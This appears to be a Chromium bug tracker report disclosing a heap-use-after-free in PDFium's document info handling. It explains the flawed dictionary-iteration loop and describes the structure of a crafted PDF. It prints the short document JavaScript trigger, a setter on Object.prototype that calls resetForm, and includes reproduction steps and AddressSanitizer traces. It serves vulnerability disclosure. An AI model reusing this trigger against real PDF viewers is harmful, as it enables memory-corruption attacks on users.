VULNERABILITY DETAILS
This bug is present in CJS_Document::get_info method of cjs_document.cpp.
This method has below mentioned for loop.
//This for loop iterates a CPDF_Dictionary object.
//CPDF_Dictionary object keeps a std::map object to manage its' data and
//also provides and iterator for this std::map.
for (const auto& it : *pDictionary) {
const ByteString& bsKey = it.first;
CPDF_Object* pValueObj = it.second.get();
WideString wsKey = WideString::FromUTF8(bsKey.AsStringView());
if (pValueObj->IsString() || pValueObj->IsName()) {
//Here this method tries to put a property to a Javascript object.
//It is possible to execute Javascript code, which will invalidate the iterator
//by defining a setter to Javascript Object.prototype.
pRuntime->PutObjectProperty(
pObj, wsKey,
pRuntime->NewString(pValueObj->GetUnicodeText().AsStringView()));
.....
}
Contents of PDF file
--------------------
This PDF file has a text field named 'txt1'.
It also defines a information dictionary (To store Author, Creation Date etc).
This PDF file uses same PDF object as dictionary for 'txt1' text field and information dictionary.
So when CJS_Document::get_info method iterates through information dictionary, below Javascript code
will delete object with key "V" from dictionary of text field. This will invalidate the iterator of for loop.
Document Javascript Section
----------------------------
function run()
{
var doc = this;
Object.prototype.__defineSetter__('V', function(){
doc.resetForm();
});
info = this.info();
}
app.setTimeOut('run()',3000);
VERSION
Chrome Version: [69.0.3497.100] + [stable]
[72.0.3580.0] + [TOT build]
Operating System: [Windows 10, Ubuntu 16.04]
REPRODUCTION CASE
1. Open Chrome
2. Navigate to pdf_get_info.pdf file.
PDF Plugin process will crash.
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: [PDF Plugin process]
Crash State: [Address Sanitizer output]
==1==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400003d958 at pc 0x5603d63e8859 bp 0x7fffb18c67f0 sp 0x7fffb18c67e8
READ of size 8 at 0x60400003d958 thread T0 (chrome)
#0 0x5603d63e8858 in std::__1::__tree_end_node<std::__1::__tree_node_base<void*>*>* std::__1::__tree_next_iter<std::__1::__tree_end_node<std::__1::__tree_node_base<void*>*>*, std::__1::__tree_node_base<void*>*>(std::__1::__tree_node_base<void*>*) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__tree:185:14
#1 0x5603d63e8858 in std::__1::__tree_const_iterator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>*, long>::operator++() /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__tree:921:0
#2 0x5603d63e8858 in std::__1::__map_const_iterator<std::__1::__tree_const_iterator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>*, long> >::operator++() /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/map:772:0
#3 0x5603d63e8858 in CJS_Document::get_info(CJS_Runtime*) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_document.cpp:744:0
#4 0x5603d64184e8 in void JSPropGetter<CJS_Document, &(CJS_Document::get_info(CJS_Runtime*))>(char const*, char const*, v8::Local<v8::String>, v8::PropertyCallbackInfo<v8::Value> const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/js_define.h:85:23
#5 0x5603d63fe96c in CJS_Document::get_info_static(v8::Local<v8::String>, v8::PropertyCallbackInfo<v8::Value> const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_document.h:51:3
#6 0x7fc103414a5d in v8::internal::PropertyCallbackArguments::BasicCallNamedGetterCallback(void (*)(v8::Local<v8::Name>, v8::PropertyCallbackInfo<v8::Value> const&), v8::internal::Handle<v8::internal::Name>, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>) /chromium/src/out/asan/../../v8/src/api-arguments-inl.h:196:3
#7 0x7fc1034141bc in v8::internal::PropertyCallbackArguments::CallAccessorGetter(v8::internal::Handle<v8::internal::AccessorInfo>, v8::internal::Handle<v8::internal::Name>) /chromium/src/out/asan/../../v8/src/api-arguments-inl.h:328:10
#8 0x7fc1036ef56a in v8::internal::Object::GetPropertyWithAccessor(v8::internal::LookupIterator*) /chromium/src/out/asan/../../v8/src/objects.cc:1601:34
#9 0x7fc1036ed144 in v8::internal::Object::GetProperty(v8::internal::LookupIterator*, v8::internal::OnNonExistent) /chromium/src/out/asan/../../v8/src/objects.cc:1071:16
#10 0x7fc1033ca91f in v8::internal::LoadIC::Load(v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Name>) /chromium/src/out/asan/../../v8/src/ic/ic.cc:469:5
#11 0x7fc1033f1009 in v8::internal::__RT_impl_Runtime_LoadIC_Miss(v8::internal::Arguments, v8::internal::Isolate*) /chromium/src/out/asan/../../v8/src/ic/ic.cc:2174:5
#12 0x7fc1033f03fa in v8::internal::Runtime_LoadIC_Miss(int, v8::internal::Object**, v8::internal::Isolate*) /chromium/src/out/asan/../../v8/src/ic/ic.cc:2158:1
#13 0x7fc10474b194 in Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_NoBuiltinExit embedded.cc:?
#14 0x7fc10474b194 in ?? ??:0
#15 0x7fc10481d1cc in Builtins_LdaNamedPropertyHandler embedded.cc:?
#16 0x7fc10481d1cc in ?? ??:0
#12 0x7ee03d60ab8d (<unknown module>)
#13 0x7ee03d60ab8d (<unknown module>)
#17 0x7fc104493222 in Builtins_JSEntryTrampoline embedded.cc:?
#18 0x7fc104493222 in ?? ??:0
#15 0x7ee03d6020dd (<unknown module>)
#19 0x7fc1031003cd in v8::internal::GeneratedCode<v8::internal::Object*, v8::internal::Object*, v8::internal::Object*, v8::internal::Object*, int, v8::internal::Object***>::Call(v8::internal::Object*, v8::internal::Object*, v8::internal::Object*, int, v8::internal::Object***) /chromium/src/out/asan/../../v8/src/simulator.h:113:12
#20 0x7fc1031003cd in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::Object>, v8::internal::Execution::MessageHandling, v8::internal::Execution::Target) /chromium/src/out/asan/../../v8/src/execution.cc:154:0
#21 0x7fc1030fec0d in v8::internal::(anonymous namespace)::CallInternal(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Execution::MessageHandling, v8::internal::Execution::Target) /chromium/src/out/asan/../../v8/src/execution.cc:190:10
#22 0x7fc1030fe9e6 in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) /chromium/src/out/asan/../../v8/src/execution.cc:201:10
#23 0x7fc10222e1fe in v8::Script::Run(v8::Local<v8::Context>) /chromium/src/out/asan/../../v8/src/api.cc:2116:7
#24 0x5603d6349bbc in CFXJS_Engine::Execute(fxcrt::WideString const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cfxjs_engine.cpp:540:25
#25 0x5603d65e04a2 in CJS_Runtime::ExecuteScript(fxcrt::WideString const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_runtime.cpp:176:10
#26 0x5603d649624e in CJS_EventContext::RunScript(fxcrt::WideString const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_event_context.cpp:53:23
#27 0x5603d637b7e7 in CJS_App::RunJsScript(CJS_Runtime*, fxcrt::WideString const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_app.cpp:430:13
#28 0x5603d637b511 in CJS_App::TimerProc(GlobalTimer*) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_app.cpp:417:5
...
0x60400003d958 is located 8 bytes inside of 48-byte region [0x60400003d950,0x60400003d980)
freed by thread T0 (chrome) here:
#0 0x5603ce6b12e2 in operator delete(void*) _asan_rtl_:3
#1 0x5603d586f1e3 in std::__1::__libcpp_deallocate(void*, unsigned long) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/new:279:10
#2 0x5603d586f1e3 in std::__1::allocator<std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*> >::deallocate(std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>*, unsigned long) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:1802:0
#3 0x5603d586f1e3 in std::__1::allocator_traits<std::__1::allocator<std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*> > >::deallocate(std::__1::allocator<std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*> >&, std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>*, unsigned long) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:1556:0
#4 0x5603d586f1e3 in std::__1::__tree<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__map_value_compare<fxcrt::ByteString, std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::less<fxcrt::ByteString>, true>, std::__1::allocator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > > > >::erase(std::__1::__tree_const_iterator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>*, long>) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__tree:2370:0
#5 0x5603d5866751 in std::__1::map<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> >, std::__1::less<fxcrt::ByteString>, std::__1::allocator<std::__1::pair<fxcrt::ByteString const, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > > > >::erase(std::__1::__map_iterator<std::__1::__tree_iterator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>*, long> >) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/map:1194:56
#6 0x5603d5866751 in CPDF_Dictionary::RemoveFor(fxcrt::ByteString const&) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:226:0
#7 0x5603d5a72e52 in CPDF_FormField::ResetField(NotificationOption) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfdoc/cpdf_formfield.cpp:242:18
#8 0x5603d5a87bc3 in CPDF_InteractiveForm::ResetForm(NotificationOption) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfdoc/cpdf_interactiveform.cpp:823:13
#9 0x5603d63e185d in CJS_Document::resetForm(CJS_Runtime*, std::__1::vector<v8::Local<v8::Value>, std::__1::allocator<v8::Local<v8::Value> > > const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_document.cpp:577:15
#10 0x5603d645e6fd in void JSMethod<CJS_Document, &(CJS_Document::resetForm(CJS_Runtime*, std::__1::vector<v8::Local<v8::Value>, std::__1::allocator<v8::Local<v8::Value> > > const&))>(char const*, char const*, v8::FunctionCallbackInfo<v8::Value> const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/js_define.h:135:23
#11 0x5603d64045a2 in CJS_Document::resetForm_static(v8::FunctionCallbackInfo<v8::Value> const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_document.h:108:3
#12 0x7fc10249ec50 in v8::internal::FunctionCallbackArguments::Call(v8::internal::CallHandlerInfo*) /chromium/src/out/asan/../../v8/src/api-arguments-inl.h:140:3
#13 0x7fc10249b262 in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<false>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) /chromium/src/out/asan/../../v8/src/builtins/builtins-api.cc:109:36
#14 0x7fc102497870 in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) /chromium/src/out/asan/../../v8/src/builtins/builtins-api.cc:139:5
#15 0x7fc102496a16 in v8::internal::Builtin_HandleApiCall(int, v8::internal::Object**, v8::internal::Isolate*) /chromium/src/out/asan/../../v8/src/builtins/builtins-api.cc:127:1
#16 0x7fc10474b194 in Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_NoBuiltinExit embedded.cc:?
#17 0x7fc10474b194 in ?? ??:0
#13 0x7ee03d60ab8d (<unknown module>)
#18 0x7fc104489965 in Builtins_ArgumentsAdaptorTrampoline embedded.cc:?
#19 0x7fc104489965 in ?? ??:0
#20 0x7fc104493222 in Builtins_JSEntryTrampoline embedded.cc:?
#21 0x7fc104493222 in ?? ??:0
#16 0x7ee03d6020dd (<unknown module>)
#22 0x7fc1031003cd in v8::internal::GeneratedCode<v8::internal::Object*, v8::internal::Object*, v8::internal::Object*, v8::internal::Object*, int, v8::internal::Object***>::Call(v8::internal::Object*, v8::internal::Object*, v8::internal::Object*, int, v8::internal::Object***) /chromium/src/out/asan/../../v8/src/simulator.h:113:12
#23 0x7fc1031003cd in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::Object>, v8::internal::Execution::MessageHandling, v8::internal::Execution::Target) /chromium/src/out/asan/../../v8/src/execution.cc:154:0
#24 0x7fc1030fec0d in v8::internal::(anonymous namespace)::CallInternal(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Execution::MessageHandling, v8::internal::Execution::Target) /chromium/src/out/asan/../../v8/src/execution.cc:190:10
#25 0x7fc1030fe9e6 in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) /chromium/src/out/asan/../../v8/src/execution.cc:201:10
#26 0x7fc1036fbd53 in v8::internal::Object::SetPropertyWithDefinedSetter(v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::JSReceiver>, v8::internal::Handle<v8::internal::Object>, v8::internal::ShouldThrow) /chromium/src/out/asan/../../v8/src/objects.cc:1779:3
#27 0x7fc1036fbd53 in v8::internal::Object::SetPropertyWithAccessor(v8::internal::LookupIterator*, v8::internal::Handle<v8::internal::Object>, v8::internal::ShouldThrow) /chromium/src/out/asan/../../v8/src/objects.cc:1739:0
#28 0x7fc10373972d in v8::internal::Object::SetPropertyInternal(v8::internal::LookupIterator*, v8::internal::Handle<v8::internal::Object>, v8::internal::LanguageMode, v8::internal::StoreOrigin, bool*) /chromium/src/out/asan/../../v8/src/objects.cc:5157:16
#29 0x7fc103738cb4 in v8::internal::Object::SetProperty(v8::internal::LookupIterator*, v8::internal::Handle<v8::internal::Object>, v8::internal::LanguageMode, v8::internal::StoreOrigin) /chromium/src/out/asan/../../v8/src/objects.cc:5212:9
#30 0x7fc103c59fa6 in v8::internal::Runtime::SetObjectProperty(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, v8::internal::LanguageMode, v8::internal::StoreOrigin) /chromium/src/out/asan/../../v8/src/runtime/runtime-object.cc:368:3
#31 0x7fc10226ba89 in v8::Object::Set(v8::Local<v8::Context>, v8::Local<v8::Value>, v8::Local<v8::Value>) /chromium/src/out/asan/../../v8/src/api.cc:4025:7
#32 0x5603d6337e14 in CFX_V8::PutObjectProperty(v8::Local<v8::Object>, fxcrt::WideString const&, v8::Local<v8::Value>) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cfx_v8.cpp:52:9
#33 0x5603d63e8137 in CJS_Document::get_info(CJS_Runtime*) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_document.cpp:749:17
...
previously allocated by thread T0 (chrome) here:
#0 0x5603ce6b06a2 in operator new(unsigned long) _asan_rtl_:3
#1 0x5603d5870366 in std::__1::__libcpp_allocate(unsigned long, unsigned long) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/new:259:10
#2 0x5603d5870366 in std::__1::allocator<std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*> >::allocate(unsigned long, void const*) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:1799:0
#3 0x5603d5870366 in std::__1::allocator_traits<std::__1::allocator<std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*> > >::allocate(std::__1::allocator<std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*> >&, unsigned long) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:1548:0
#4 0x5603d5870366 in std::__1::unique_ptr<std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>, std::__1::__tree_node_destructor<std::__1::allocator<std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*> > > > std::__1::__tree<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__map_value_compare<fxcrt::ByteString, std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::less<fxcrt::ByteString>, true>, std::__1::allocator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > > > >::__construct_node<std::__1::piecewise_construct_t const&, std::__1::tuple<fxcrt::ByteString&&>, std::__1::tuple<> >(std::__1::piecewise_construct_t const&, std::__1::tuple<fxcrt::ByteString&&>&&, std::__1::tuple<>&&) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__tree:2191:0
#5 0x5603d586f92b in std::__1::pair<std::__1::__tree_iterator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>*, long>, bool> std::__1::__tree<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__map_value_compare<fxcrt::ByteString, std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::less<fxcrt::ByteString>, true>, std::__1::allocator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > > > >::__emplace_unique_key_args<fxcrt::ByteString, std::__1::piecewise_construct_t const&, std::__1::tuple<fxcrt::ByteString&&>, std::__1::tuple<> >(fxcrt::ByteString const&, std::__1::piecewise_construct_t const&, std::__1::tuple<fxcrt::ByteString&&>&&, std::__1::tuple<>&&) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__tree:2137:29
#6 0x5603d5869b56 in std::__1::map<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> >, std::__1::less<fxcrt::ByteString>, std::__1::allocator<std::__1::pair<fxcrt::ByteString const, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > > > >::operator[](fxcrt::ByteString&&) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/map:1329:20
#7 0x5603d58640cb in CPDF_Dictionary::SetFor(fxcrt::ByteString const&, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> >) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:206:3
#8 0x5603d5962e19 in CPDF_SyntaxParser::GetObjectBodyInternal(CPDF_IndirectObjectHolder*, CPDF_SyntaxParser::ParseType) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_syntax_parser.cpp:514:16
#9 0x5603d59672bf in CPDF_SyntaxParser::GetIndirectObject(CPDF_IndirectObjectHolder*, CPDF_SyntaxParser::ParseType) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_syntax_parser.cpp:556:7
#10 0x5603d59111a9 in CPDF_Parser::ParseIndirectObjectAt(long, unsigned int) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:921:28
#11 0x5603d5913644 in CPDF_Parser::ParseIndirectObject(unsigned int) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:870:12
#12 0x5603d5872b4e in CPDF_Document::ParseIndirectObject(unsigned int) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_document.cpp:195:33
#13 0x5603d58b11c8 in CPDF_IndirectObjectHolder::GetOrParseIndirectObject(unsigned int) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_indirect_object_holder.cpp:50:42
#14 0x5603d5937771 in CPDF_Reference::GetDirect() /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_reference.cpp:93:35
#15 0x5603d57d7ed3 in CPDF_Array::GetDirectObjectAt(unsigned long) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_array.cpp:106:24
#16 0x5603d57d86ac in CPDF_Array::GetDictAt(unsigned long) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_array.cpp:140:20
#17 0x5603d5a83f21 in CPDF_InteractiveForm::CPDF_InteractiveForm(CPDF_Document*) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfdoc/cpdf_interactiveform.cpp:595:24
#18 0x5603d61b1dee in ReportUnsupportedFeatures(CPDF_Document*) /chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_helpers.cpp:242:32
#19 0x5603e7cd7009 in (anonymous namespace)::LoadDocumentImpl(fxcrt::RetainPtr<IFX_SeekableReadStream> const&, char const*) /chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fpdf_view.cpp:156:3
#20 0x5603e7cd7a0e in FPDF_LoadCustomDocument /chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fpdf_view.cpp:282:10
#21 0x5603e7bdbfc9 in chrome_pdf::PDFiumDocument::LoadDocument(char const*) /chromium/src/out/asan/../../pdf/pdfium/pdfium_document.cc:100:23
#22 0x5603e7b9bfea in chrome_pdf::PDFiumEngine::TryLoadingDoc(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, bool*) /chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:2615:14
#23 0x5603e7b63625 in chrome_pdf::PDFiumEngine::LoadDocument() /chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:2588:7
#24 0x5603e7b65406 in chrome_pdf::PDFiumEngine::OnDocumentComplete() /chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:960:3
#25 0x5603e7be5ecc in chrome_pdf::DocumentLoaderImpl::ReadComplete() /chromium/src/out/asan/../../pdf/document_loader_impl.cc:407:14
#26 0x5603e7be63d7 in chrome_pdf::DocumentLoaderImpl::DidRead(int) /chromium/src/out/asan/../../pdf/document_loader_impl.cc:319:14
...
CREDIT INFORMATION
Reporter credit: [Anonymous]
|
Deleted:
pdf_get_info.pdf
1.1 KB
|
Comment 1 by chamal.d...@gmail.com, Oct 14